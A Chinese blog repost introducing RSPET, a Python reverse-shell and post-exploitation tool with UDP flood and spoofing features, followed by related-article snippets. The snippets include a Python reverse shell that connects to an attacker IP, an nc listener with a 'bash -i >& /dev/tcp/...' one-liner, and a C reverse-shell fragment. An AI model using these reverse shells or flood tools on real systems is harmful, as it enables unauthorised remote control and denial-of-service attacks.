python渗透工具,基于 Python 的反连 Shell 和后渗透工具

最新推荐文章于 2022-04-01 01:15:13 发布
最新推荐文章于 2022-04-01 01:15:13 发布
阅读量203 收藏
点赞数
文章标签: python渗透工具

RSPET (Reverse Shell and Post Exploitation Tool) 是一个基于Python的反连shell,并且具备后渗透阶段的一些功能。注意:在V0.0.3版本中添加了一个min文件夹,因为这个新版本包含了其它不影响主功能(反连shell)的其它功能

min不会引入v0.0.3之后版本的任何更多功能,只接受与bug和性能相关的补丁。

目前的版本:v0.0.6

功能

远程命令执行

流量加密(异或加密代替明文传输),使用443端口可以取得更好的效果

内置了加密传输文件或二进制数据的功能

内置UDP洪泛攻击工具

内置UDP欺骗攻击工具

管理多个或全部主机,控制多个连接的主机传输文件和UDP洪泛攻击。

模块化的代码设计,易于定制

客户端脚本已经过测试,可以兼容Pyinstaller(可以转换成.exe)

1.UDP欺骗使用了RAW_SOCKETS,所以为了正常使用,客户端需要运行在支持RAW_SOCKETS的操作系统(大部分基于Unix的系统)上,并且有root权限。最后,许多ISP在某地方做了手脚,有可能会丢弃或者修改欺骗的数据包。

2.查看EXPANDING,方便你添加新的功能,或者根据你的需要定制RSPET

3.查看primalsecurity.net的博客,了解生成.exe的方法

部署

RSPET_server.py或RSPET_server_min.py运行在攻击机上,接收连接。

RSPET_client.py或RSPET_client_min.py运行在目标机上,会初始化并发送连接请求,等待输入。

执行

服务端:

[cc lang=”php”]

python RSPET_server.py (max_connections)

[/cc]

max_connections如果为空,则默认为5.

控制端:

[cc lang=”php”]

python RSPET_client.py server_ip

[/cc]

可以根据个人需要进行调整

Linux发行版

包含RSPET的Linux发行版列表

BlackArch Linux (2016.04.28版本中)

原创文章,作者:老D,如若转载,请注明出处:https://laod.cn/tools/python-shell-penetration-tool.html

会写诗的杨万里
关注
最全Python渗透测试工具合集及书籍推荐
01-19 1293
​​​​​​ 如果你热爱漏洞研究、逆向工程或者渗透测试,我强烈推荐你使用 Python 作为编程语言。它包含大量实用的库和工具,本文会列举其中部分精华。 老规矩,需要打包好的软件关注小编,QQ群:721195303领取。 网络 Scapy, Scapy3k: 发送,嗅探,分析和伪造网络数据包。可用作交互式包处理程序或单独作为一个库。 pypcap, Pcapy, pylibpcap: 几个不同 libpcap 捆绑的python库 libdnet: 低级网络路由,包括端口查看和以太网帧的转发 dpkt:
Python渗透测试编程基础——Socket网络编程
PICACHU+++的博客
03-24 2535
Socket通信是基于客户端/服务器结构(C/S),可隐藏复杂的TCP/IP协议族,只要遵循Socket的规定就可以进行网络程序开发,简单且开发效率高。Python中的socket模块,提供了套接字编程的大部分功能。支持使用UDP和TCP协议进行网络通信。UDP属于无连接协议,在向接收方发送信息时不需要建立连接,而是直接发送即可。Socket又称"套接字",是计算机间进行网络通信的一套程序接口。UDP的应用:域名系统;socket模块方法如图所示。一、socket编程简介。UDP编程流程及常用的。
My-Penetration-Tools:记录下自己写的一些懒人脚本,涉及信息收集,漏洞Poc&Exp
03-15
:horse: 我的渗透工具 记录下自己写的一些懒人脚本,涉及信息收集,漏洞Poc&exp :high_voltage: 池人的Fofa蜘蛛 穷人版Fofa采集工具
Simple python reverse shell
abg49988的博客
08-22 151
import base64,sys; import socket,struct s=socket.socket(2,socket.SOCK_STREAM) s.connect(('Attack's IP address',ListenerPort)) l=struct.unpack('>I',s.recv(4))[0] d=s.recv(l) while len(d...
基于Python渗透测试工具(开源)—— Potato
weixin_43526443的博客
03-05 2353
Git仓库地址: https://github.com/Potato-py/Potato 工具说明: 环境:Python3 使用: 双击运行Start.bat 或 使用命令行执行python 脚本名.py +-------------------------------------------------------------------------------------------------------------+ | ...
python 网络渗透_python 网络编程(渗透与编程一)
weixin_39755824的博客
11-20 385
0x00网络一直是黑客们最喜欢的竞技场。通过简单的网络访问,攻击者可以做任何想做的事情。例如主机扫描,数据包注入,远程攻击等。但是当我们通过某种方法进入某企业内网,假设在次内网中无任何工具可以利用,但是你惊讶的发现目标环境中安装了Python环境,那么我们可以利用这个环境,将编写你所可能要用到的工具,实现我们的渗透。我们的目标不是成为网络编程高手,我们只需要迅速,简单,可靠的处理日常的任务工具。0...
Python开源项目大全
catch
04-03 2081
Python 作为程序员的宠儿,越来越得到人们的关注,使用 Python 进行应用程序开发的越来也多。那么,在 2013 年有哪些流行的 Python 项目呢?下面,我们一起来看下。   一、测试和调试 python_koans:Python Koans 算 “Ruby Koans” 的一部分,作为交互式教程,可以学习 TDD 技巧。sure:Sure 是最适合自动化测试的 Pyt
python渗透工具
最新发布
08-13
Python渗透工具是使用Python编程语言开发的用于渗透测试和网络安全工程的工具。这些工具利用Python的灵活性和强大的库来帮助安全专业人员自动化和简化渗透测试过程。以下是一些常见的Python渗透工具: 1. IPython: ...
Python-为该工具提供一个nessus文件它会自动为您提供MSFshell
08-10
为该工具提供一个nessus文件它会自动为您提供MSFshell",显然是一个利用Python编写的命令行工具,其目的是将Nessus扫描结果(.nessus文件)转化为Metasploit中的shell,便于进行进一步的安全测试和分析。 首先,...
RCE_Web_Shell_Python:与Web Shell交互的python方法
05-27
使用Python与Web Shell进行交互 无论您是经验丰富的渗透测试员还是初学者,渗透测试的领域都是一英里长和一英里深。 所有学科中的机会是无止境的。 进攻安全性提供了一个高级课程,称为高级Web攻击和利用(AWAE) ,...
python安全开发/高级渗透技术
06-13
课程内容包括python语言应用、介绍、开发实例、python gui编程、网络编程、数据库编程、爬虫编程、python开发扫描器、爆炸工具、漏洞利用等,通过本教材的学习,我们可以深入了解最先进的python语言。在语言开发、爬虫工具开发、黑客工具开发等方面。它正在学习python以及网络和信息。安全人员至关重要。
反向连接的SHELL
digwtx的专栏
03-29 1172
#include #pragma comment(lib,"Ws2_32.lib")int WINAPI WinMain(){    WSADATA wsaData;    SOCKET hSocket;    STARTUPINFO si;    PROCESS_INFORMATION pi;    struct sockaddr_in adik_sin;    memset(&adik_sin
Python渗透测试编程技术——漏洞渗透模块
bluepangzi的博客
03-30 390
漏洞渗透模块一、测试软件的溢出漏洞栈溢出漏洞发现自行构造数据包加大字符串的数量二、计算软件溢出的偏移地址显示软件FreeFloat FTP Server执行到地址“41414141”处时就无法再继续进行三、查找JMP ESP指令 一、测试软件的溢出漏洞 栈溢出漏洞发现 FreeFloat FTP Server会在运行的主机上建立一个FTP,主机192.168.0.116的C盘中运行FTP软件,在另一计算机中可使用FTP下载工具或命令方式进行访问。 (使用 FreeFloat FTP Server服务器对登
反向 shell
lyyslsw的专栏
12-27 651
nc -p 4444 -lvv 监听在4444端口, 监听模式, 显示命令执行过程, 假设本机IP地址10.100.125.15 bash -i >& /dev/tcp/10.100.125.15/44440>&1, 假设本机IP地址为10.100.125.14 bash -i : bash的交互模式 当>&后面接文件时,表示将标准输...
Python渗透测试编程技术大全
ada的博客
03-30 1499
Python渗透测试编程技术大全 一、漏洞渗透模块1、测试软件的溢出漏洞(1)栈溢出漏洞发现2、计算软件溢出的偏移地址3、查找JMP ESP指令(1)执行恶意的攻击载荷二、网络嗅探与欺骗1、网络数据嗅探(1)编写一个网络嗅探工具(2)调用WireShark来查看数据包2、ARP的原理与缺陷(1)中间人欺骗(2)中间人欺骗的原理三、拒绝服务攻击1、数据链路层的拒绝服务攻击(1)攻击方式2、网络层的拒绝服务攻击(1)网络层的协议:ARP、IP和ICMP等(2)如何提高发送到目标的数据包的数量3、传输层的拒绝服务
利用 50 行 Python 代码构建一个在线文本生成器!
CSDN资讯
11-01 2082
本指南将引导你学习构建一个自动完成任意输入文本的Web应用程序。 作者 |Dev Sharma 译者 |苏本如,责编 | 郭芮 出品 | CSDN(ID:CSDNnews) 以下为译文: 在本文中,我们将使用OpenAI的新一代表语言模型GPT-2来建立模型,使用Panel框架来构建web页面的仪表板。本指南分为两部分。在第一部分中,我们将加载我们的模型并编写一个...
黑客零基础第一章--反向shell
ShadowBlade
08-09 4982
一篇文章叫你完全掌握反向shell
[笔记]Windows安全之《一》反弹Shell
二次元怪兽的博客
04-01 2072
powershell反弹shell常见方式 文章目录正向连接和反向连接(反弹连接)PowerShell的配置常见的反弹Shell总结 正向连接和反向连接(反弹连接) PowerShell的配置 常见的反弹Shell 总结
反向shell实操
TingSty小z的博客
02-25 4772
实验一: A机器传递信息到B机器: 测试环境macOS 10.15 1、A用nc命令 listen本机一个端口号 nc -l 8000 2、B 用telnet命令 去连接A机器的ip和端口号 telnet ipA 8000 3、显示连接成功后,B机器可以输入文本,文本会传输到A机器上。实现B-》A的信息传输 telnet的退出 ctrl+] 实验二: 反向shell,A机器控制B机器 一种方式是ssh 登录到B机器上,这种属于正向Shell,A主动连接B,然后控制B; 另一种方式:方向shell,B
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值